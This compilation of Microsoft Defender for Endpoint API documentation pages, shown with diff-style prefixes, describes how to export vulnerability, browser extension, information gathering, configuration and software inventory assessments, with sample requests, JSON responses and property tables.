-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/Vulnerabilities
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Vulnerabilities",
- "value": [
- {
- "id": "CVE-2019-0608",
- "name": "CVE-2019-0608",
- "description": "A spoofing vulnerability exists when Microsoft Browsers does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could impersonate a user request by crafting HTTP queries. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.To exploit the vulnerability, the user must click a specially crafted URL. In an email attack scenario, an attacker could send an email message containing the specially crafted URL to the user in an attempt to convince the user to click it.In a web-based attack scenario, an attacker could host a specially crafted website designed to appear as a legitimate website to the user. However, the attacker would have no way to force the user to visit the specially crafted website. The attacker would have to convince the user to visit the specially crafted website, typically by way of enticement in an email or instant message, and then convince the user to interact with content on the website.The update addresses the vulnerability by correcting how Microsoft Browsers parses HTTP responses.",
- "severity": "Medium",
- "cvssV3": 4.3,
- "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C",
- "exposedMachines": 4,
- "publishedOn": "2019-10-08T00:00:00Z",
- "updatedOn": "2019-12-16T16:20:00Z",
- "publicExploit": false,
- "exploitVerified": false,
- "exploitInKit": false,
- "exploitTypes": [],
- "exploitUris": [],
- "CveSupportability": "supported"
- }
- ]
-
-}
-```
-
-## See also
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get Assessment Browser Extensions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-assessment-browser-extensions.md
- Title: Export browser extensions assessment
-description: Returns a table with an entry for every unique combination of DeviceId, BrowserName, ExtensionID.
------- m365-security-- tier3-- must-keep--- Previously updated : 06/01/2022--
-# Export browser extensions assessment per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink).
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
-
-Returns all known installed browser extensions and their details for all devices, on a per-device basis.
-
-Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
--- [Export browser extensions assessment **JSON response**](#1-export-browser-extensions-assessment-json-response) The API pulls all data in your organization as Json responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- [Export browser extensions assessment **via files**](#2-export-browser-extension-assessment-via-files) This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected (using either _Json response_ or _via files_) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**).
-
-## 1. Export browser extensions assessment (JSON response)
-
-### 1.1 API method description
-
-This API response contains all the data for installed browser extensions per device. Returns a table with an entry for every unique combination of DeviceId, BrowserName, ExtensionId.
-
-#### 1.1.1 Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management software information'
-
-### 1.3 URL
-
-```http
-GET /api/Machines/BrowserExtensionsInventoryByMachine
-```
-
-### 1.4 Parameters
--- pageSize (default = 50,000): Number of results in response.-- $top: Number of results to return (doesn't return @odata.nextLink and therefore doesn't pull all the data)-
-### 1.5 Properties
-
-> [!NOTE]
->
-> - Each record is approximately 0.5KB of data. You should take this into account when choosing the correct pageSize parameter for you.
-> - The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description
-:|:|:
-BrowserName|string|Name of the browser where the extension is installed.
-DeviceId|string|Unique identifier for the device.
-DeviceName|string|Fully qualified domain name (FQDN) of the device.
-ExtensionDescription|string| Description of a specific browser extension.
-ExtensionId|string|Unique identifier for a specific browser extension.
-ExtensionName|string|Name of a specific browser extension.
-ExtensionRisk|string|The highest risk level generated by the browser extension. Possible values are: "None", "Low", "Medium", "High", "Critical".
-ExtensionVersion|string|Version number of a specific browser extension.
-IsActivated|Boolean|Indicates whether a browser extension is active.
-RbacGroupId|integer|The role-based access control (RBAC) group ID.
-RbacGroupName|string|The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-InstallationTime|string|The time the browser extension was installed.
-Permissions|Array[string]|The set of permissions requested by a specific browser extension.
-
-### 1.6 Examples
-
-#### 1.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/Machines/BrowserExtensionsInventoryByMachine?pageSize=5 &sinceTime=2021-05-19T18%3A35%3A49.924Z
-```
-
-#### 1.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(contoso.windowsDefenderATP.api.AssetSoftware)",
- "value": [
- {
- "DeviceId": "1c32162b42e9efa1f5de42f951775f22f435c997",
- "DeviceName": "computerpii_1363c2e016e2225cb03974df58f14e6968067aa8.domainpii_f260e982985f7e8eee198b4332e0ae5b2a069cd6.corp.microsoft.com",
- "RbacGroupId": 86,
- "RbacGroupName": "UnassignedGroup",
- "InstallationTime": "2022-05-26T18:46:27.000Z",
- "BrowserName": "chrome",
- "ExtensionId": "dkpejdfnpdkhifgbancbammdijojoffk",
- "ExtensionName": "Logitech Smooth Scrolling",
- "ExtensionDescription": "Buttery-smooth scrolling for Logitech mice and touchpads.",
- "ExtensionVersion": "6.65.62",
- "ExtensionRisk": "High",
- "IsActivated": true,
- "Permissions": [
- {
- "Id": "tabs",
- "IsRequired": true,
- "Risk": "High"
- },
- {
- "Id": http://*/*,
- "IsRequired": true,
- "Risk": "High"
- },
- {
- "Id": https://*/*,
- "IsRequired": true,
- "Risk": "High"
- }
- ]
-}
- ],
- "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/Machines/BrowserExtensionsInventoryByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0yNS8wMjAwLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
-}
-```
-
-## 2. Export browser extension assessment (via files)
-
-### 2.1 API method description
-
-This API response contains all the data for installed browser extensions per device. Returns a table with an entry for every unique combination of DeviceId, BrowserName, ExtensionId.
-
-#### 2.1.1 Limitations
-
-Rate limitations for this API are 5 calls per minute and 20 calls per hour.
-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management software information'
-
-### 2.3 URL
-
-```http
-GET /api/machines/browserextensionsinventoryExport
-```
-
-### 2.4 Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours)-
-### 2.5 Properties
-
-> [!NOTE]
->
-> - The files are gzip compressed & in multiline JSON format.
-> - The download URLs are only valid for 3 hours. Otherwise you can use the parameter.
-> - For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data resides.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization|"[Https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
-GeneratedTime|string|The time that the export was generated.|2021-05-20T08:00:00Z
-
-### 2.6 Examples
-
-#### 2.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/browserextensionsinventoryExport
-```
-
-#### 2.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles": [
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/BrowserExtensions/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/BrowserExtensions/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/BrowserExtensions/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
- ],
- "generatedTime": "2021-01-11T11:01:00Z"
-}
-```
-
-## See also
--- [Get browser extensions permission info](get-browser-extensions-permission-info.md)-- [Browser extensions assessment](../../defender-vulnerability-management/tvm-browser-extensions.md)-
-## Other related
--- [Vulnerability management](../../defender-vulnerability-management/defender-vulnerability-management.md)-- [Vulnerabilities in your organization](../../defender-vulnerability-management/tvm-weaknesses.md)
security Get Assessment Information Gathering https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-assessment-information-gathering.md
- Title: Export information gathering assessment
-description: Returns a table with an entry for every unique combination of DeviceId, DeviceName, Additional fields.
------- m365-security-- tier3-- must-keep---- Previously updated : 07/26/2022--
-# Information gathering assessment per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink) <br/>
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
-
-This API response returns all information gathering assessments for all devices, on a per-device basis. It returns a table with a separate entry for every DeviceId.
-
-It pulls all relevant data in your organization as a download file. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
--- Call the API to get a list of download URLs with all your organization data.-- Download all the files using the download URLs and process the data as you like.-
-Data that is collected (using _via files_) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**).
-
-## 1. Export information gathering assessment (via files)
-
-### 1.1 API method description
-
-Returns all information gathering assessments for all devices, on a per-device basis. It returns a table with a separate entry for every DeviceId.
-
-#### Limitations
-
-Rate limitations for this API are 5 calls per minute and 20 calls per hour.
-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details](apis-intro.md).
-
-Permission type|Permission|Permission display name
-||
-Application|Vulnerability.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|Vulnerability.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-### 1.3 URL
-
-```http
-GET /api/Machines/InfoGatheringExport
-```
-
-### 1.4 Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours)-
-### 1.5 Properties
-
-> [!NOTE]
-> The files are gzip compressed & in multiline Json format.
->
-> The download URLs are only valid for 3 hours; otherwise, you can use the parameter.
->
-> To maximize download speeds, make sure you are downloading the data from the same Azure region where your data resides.
->
-> Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.
-
-Property (ID)|Data type|Description
-:|:|:
-|Export files|String[array]|A list of download URLs for files holding the current snapshot of the organization.
-|GeneratedTime|DateTime|The time the export was generated.
-
-### 1.6 Examples
-
-#### 1.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/InfoGatheringExport?$sasValidHours=1
-```
-
-#### 1.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles": [
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=0/part-00001-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=9GVFFNbgkLc69u32nO944SosmcTUj0usPJqkJwx5iow%3D",
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00002-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=BJ3SfwcyI7JnoTVhHAgiyvqWviA%2BUKdF80KeVIUc%2FIU%3D",
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1001/part-00005-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=6ZsI%2FysPufyNgx234GX8A5xVuz%2FtCtq%2FQ42R2P%2F3XO4%3D",
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=12275/part-00010-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=iqJUkdUsR%2FvGL6hSA2Vqnv02%2BkRJtDhUReJHYd5TOdM%3D"
- ],
- "generatedTime": "2022-07-26T10:01:00Z"
-}
-```
-
-## Other related
--- [DeviceTvmInfoGathering](../../defender/advanced-hunting-devicetvminfogathering-table.md)-- [DeviceTvmInfoGatheringKB](../../defender/advanced-hunting-devicetvminfogatheringkb-table.md)-- [Vulnerability management](../../defender-vulnerability-management/defender-vulnerability-management.md)-- [Vulnerabilities in your organization](../../defender-vulnerability-management/tvm-weaknesses.md)
security Get Assessment Methods Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-assessment-methods-properties.md
- Title: Export assessment methods and properties per device
-description: Provides information about the APIs that pull "Microsoft Defender Vulnerability Management" data. There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
------- m365-security-- tier3-- must-keep--- Previously updated : 06/04/2021--
-# Export assessment methods and properties per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## API description
-
-Provides methods and property details about the APIs that pull vulnerability management data on a per-device basis. There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
-
-> [!NOTE]
-> Unless indicated otherwise, all export assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**).
-
-You can use the export assessment APIs to retrieve (export) different types of information:
--- [1. Export secure configurations assessment](#1-export-secure-configurations-assessment)-- [2. Export software inventory assessment](#2-export-software-inventory-assessment)-- [3. Export software vulnerabilities assessment](#3-export-software-vulnerabilities-assessment)-- [4. Export non product code software inventory assessment](#4-export-non-product-code-software-inventory-assessment)-
-The APIs that correspond to the export information types are described in sections 1, 2, and 3.
-
-Each method has different API calls to get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
--- **JSON response** The API pulls all data in your organization as JSON responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- **via files** This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected using either '_JSON response_ or _via files_' is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-## 1. Export secure configurations assessment
-
-Returns all of the configurations and their status, on a per-device basis.
-
-### 1.1 Methods
-
-Method|Data type|Description
-:|:|:
-Export secure configuration assessment **(JSON response)**|Secure configuration by device collection. See: [1.2 Properties (JSON response)](#12-properties-json-response)|Returns a table with an entry for every unique combination of DeviceId, ConfigurationId. The API pulls all data in your organization as JSON responses. This method is best for small organizations with less than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.
-Export secure configuration assessment **(via files)**|Secure configuration by device collection. See: [1.3 Properties (via files)](#13-properties-via-files)|Returns a table with an entry for every unique combination of DeviceId, ConfigurationId. This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows: <ol><li>Call the API to get a list of download URLs with all your organization data.</li><li>Download all the files using the download URLs and process the data as you like.</li></ol>
-
-### 1.2 Properties (JSON response)
-
-Property (ID)|Data type|Description
-:|:|:
-configurationCategory|String|Category or grouping to which the configuration belongs: Application, OS, Network, Accounts, Security controls.
-configurationId|String|Unique identifier for a specific configuration.
-configurationImpact|String|Rated effect of the configuration to the overall configuration score (1-10).
-configurationName|String|Display name of the configuration.
-configurationSubcategory|String|Subcategory or subgrouping to which the configuration belongs. In many cases, specific capabilities or features.
-deviceId|String|Unique identifier for the device in the service.
-deviceName|String|Fully qualified domain name (FQDN) of the device.
-isApplicable|Bool|Indicates whether the configuration or policy is applicable.
-isCompliant|Bool|Indicates whether the configuration or policy is properly configured.
-isExpectedUserImpact|Bool|Indicates whether the user gets affected if the configuration will be applied.
-osPlatform|String|Platform of the operating system running on the device. Specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See [Supported operating systems, platforms and capabilities](../../defender-vulnerability-management/tvm-supported-os.md) for details.
-osVersion|String|Specific version of the operating system running on the device.
-rbacGroupName|String|The role-based access control (RBAC) group. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-rbacGroupId|String|The role-based access control (RBAC) group ID.
-recommendationReference|String|A reference to the recommendation ID related to the software.
-timestamp|String|Last time the configuration was seen on the device.
-
-### 1.3 Properties (via files)
-
-Property (ID)|Data type|Description
-:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization.
-GeneratedTime|String|The time that the export was generated.
-
-## 2. Export software inventory assessment
-
-Returns all of the installed software and their details on each device.
-
-### 2.1 Methods
-
-|Method|Data type|Description|
-|:|:|:|
-|Export software inventory assessment **(JSON response)**|Software inventory by device collection. See: [2.2 Properties (JSON response)](#22-properties-json-response)|Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion. The API pulls all data in your organization as JSON responses. This method is best for small organizations with less than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results. |
-| Export software inventory assessment **(via files)**|Software inventory by device files. See: [2.3 Properties (via files)](#23-properties-via-files)|Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion. This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download data from Azure Storage as follows: <ol><li>Call the API to get a list of download URLs with your organization data</li><li>Download the files using the download URLs and process the data as you like.</li></ol> |
-
-### 2.2 Properties (JSON response)
-
-Property (ID)|Data type|Description
-:|:|:
-DeviceId|String|Unique identifier for the device in the service.
-DeviceName|String|Fully qualified domain name (FQDN) of the device.
-DiskPaths|Array[string]|Disk evidence that the product is installed on the device.
-EndOfSupportDate|String|The date in which support for this software has or will end.
-EndOfSupportStatus|String|End of support status. Can contain these possible values: None, EOS Version, Upcoming EOS Version, EOS Software, Upcoming EOS Software.
-NumberOfWeaknesses|Int|Number of weaknesses on this software on this device.
-OSPlatform|String|Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See [Supported operating systems, platforms and capabilities](../../defender-vulnerability-management/tvm-supported-os.md) for details.
-RbacGroupName|String|The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-rbacGroupId|String|The role-based access control (RBAC) group ID.
-RegistryPaths|Array[string]|Registry evidence that the product is installed in the device.
-SoftwareFirstSeenTimestamp|String|The first time this software was seen on the device.
-SoftwareName|String|Name of the software product.
-SoftwareVendor|String|Name of the software vendor.
-SoftwareVersion|String|Version number of the software product.
-
-### 2.3 Properties (via files)
-
-Property (ID)|Data type|Description
-:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization.
-GeneratedTime|String|The time that the export was generated.
-
-## 3. Export software vulnerabilities assessment
-
-Returns all the known vulnerabilities on a device and their details, for all devices.
-
-### 3.1 Methods
-
-Method|Data type|Description
-:|:|:
-Export software vulnerabilities assessment **(JSON response)**|Investigation collection See: [3.2 Properties (JSON response)](#32-properties-json-response)|Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId. The API pulls all data in your organization as JSON responses. This method is best for small organizations with less than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.
-Export software vulnerabilities assessment **(via files)**|Investigation entity See: [3.3 Properties (via files)](#33-properties-via-files)|Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId. This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows: <ol><li>Call the API to get a list of download URLs with all your organization data.</li><li>Download all the files using the download URLs and process the data as you like.</li></ol>
-**Delta export** software vulnerabilities assessment **(JSON response)**|Investigation collection See: [3.4 Properties Delta export (JSON response)](#34-properties-delta-export-json-response)|Returns a table with an entry for every unique combination of: DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, and EventTimestamp. <p> The API pulls data in your organization as JSON responses. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results. The full software vulnerabilities assessment (JSON response) is used to obtain an entire snapshot of the software vulnerabilities assessment of your organization by device. However, the delta export API call is used to fetch only the changes that have happened between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large amount of data every time, you'll only get specific information on new, fixed, and updated vulnerabilities. Delta export API call can also be used to calculate different KPIs such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were added to my organization?" <p> Because the Delta export API call for software vulnerabilities returns data for only a targeted date range, it isn't considered a _full export_.
-
-### 3.2 Properties (JSON response)
-
-Property (ID)|Data type|Description
-:|:|:
-CveId|String|Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system.
-CvssScore|String|The CVSS score of the CVE.
-DeviceId|String|Unique identifier for the device in the service.
-DeviceName|String|Fully qualified domain name (FQDN) of the device.
-DiskPaths|Array\[string\]|Disk evidence that the product is installed on the device.
-ExploitabilityLevel|String|The exploitability level of this vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit)
-FirstSeenTimestamp|String|First time the CVE of this product was seen on the device.
-Id|String|Unique identifier for the record.
-LastSeenTimestamp|String|Last time the CVE was seen on the device.
-OSPlatform|String|Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See [Supported operating systems, platforms and capabilities](../../defender-vulnerability-management/tvm-supported-os.md) for details.
-RbacGroupName|String|The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-rbacGroupId|String|The role-based access control (RBAC) group ID.
-RecommendationReference|String|A reference to the recommendation ID related to this software.
-RecommendedSecurityUpdate|String|Name or description of the security update provided by the software vendor to address the vulnerability.
-RecommendedSecurityUpdateId|String|Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles.
-Registry Paths|Array[string]|Registry evidence that the product is installed in the device.
-SecurityUpdateAvailable|Boolean|Indicates whether a security update is available for the software.
-SoftwareName|String|Name of the software product.
-SoftwareVendor|String|Name of the software vendor.
-SoftwareVersion|String|Version number of the software product.
-VulnerabilitySeverityLevel|String|Severity level that is assigned to the security vulnerability based on the CVSS score.
-
-### 3.3 Properties (via files)
-
-Property (ID)|Data type|Description
-:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization.
-GeneratedTime|String|The time that the export was generated.
-
-### 3.4 Properties (delta export JSON response)
-
-Property (ID)|Data type|Description
-:|:|:
-CveId |String|Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system.
-CvssScore|String|The CVSS score of the CVE.
-DeviceId|String|Unique identifier for the device in the service.
-DeviceName|String|Fully qualified domain name (FQDN) of the device.
-DiskPaths|Array[string]|Disk evidence that the product is installed on the device.
-EventTimestamp|String|The time the delta event was found.
-ExploitabilityLevel|String|The exploitability level of the vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit)
-FirstSeenTimestamp|String|First time the CVE of the product was seen on the device.
-Id|String|Unique identifier for the record.
-LastSeenTimestamp|String|Last time the CVE was seen on the device.
-OSPlatform|String|Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See [Supported operating systems, platforms and capabilities](../../defender-vulnerability-management/tvm-supported-os.md) for details.
-RbacGroupName|String|The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-RecommendationReference|String|A reference to the recommendation ID related to this software.
-RecommendedSecurityUpdate |String|Name or description of the security update provided by the software vendor to address the vulnerability.
-RecommendedSecurityUpdateId |String|Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles
-RegistryPaths |Array[string]|Registry evidence that the product is installed in the device.
-SoftwareName|String|Name of the software product.
-SoftwareVendor|String|Name of the software vendor.
-SoftwareVersion|String|Version number of the software product.
